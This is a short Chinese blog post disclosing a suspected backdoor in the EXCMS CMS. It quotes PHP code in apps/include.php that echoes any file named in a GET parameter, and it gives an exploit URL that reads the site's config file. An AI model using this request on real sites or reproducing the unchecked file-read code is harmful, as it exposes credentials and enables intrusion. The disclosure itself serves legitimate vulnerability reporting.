EXCMS 疑似再暴后门

  • A+
所属分类:lcx

某天遇到Excms的系统,官网http://www.excms.cn/

于GG搜索excms漏洞,发现 http://www.myhack58.com/Article/html/3/62/2011/28871.htm

分析中是作者明显藏有后门的漏洞

下载源码分析,很明显就能找到另一个疑似后门的漏洞(为什么说疑似?因为也不能确定,说不定就是有这样的程序员,呵呵。。)

漏洞文件:

apps/include.php

源码:

//加载系统配置文件
require_once('../configuration/inc/common.inc.php');

$file = $_GET['file'];
if($file!='' && file_exists(EXCMS_PATH.$file)){
        echo file_get_contents(EXCMS_PATH.$file);
}

不用看就知道了吧,呵呵。。。

利用:

http://www.xxxx.cn/apps/include.php?file=sitedata/config.inc.php

查看源码得:

EXCMS 疑似再暴后门

文章来源于lcx.cc:EXCMS 疑似再暴后门

相关推荐: 【视频】网友调侃中石化天价酒单《我为祖国喝茅台》

网友调侃中石化天价酒单《我为祖国喝茅台》     【视频】网友调侃中石化天价酒单《我为祖国喝茅台》,我为祖国喝茅台,中石化,网友调侃。     不做评论,政府独裁、绝对垄断、极度腐败造就了中国的当前现状。 留言评论(旧系统): 我叫罗玉凤! @ 2011-04…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: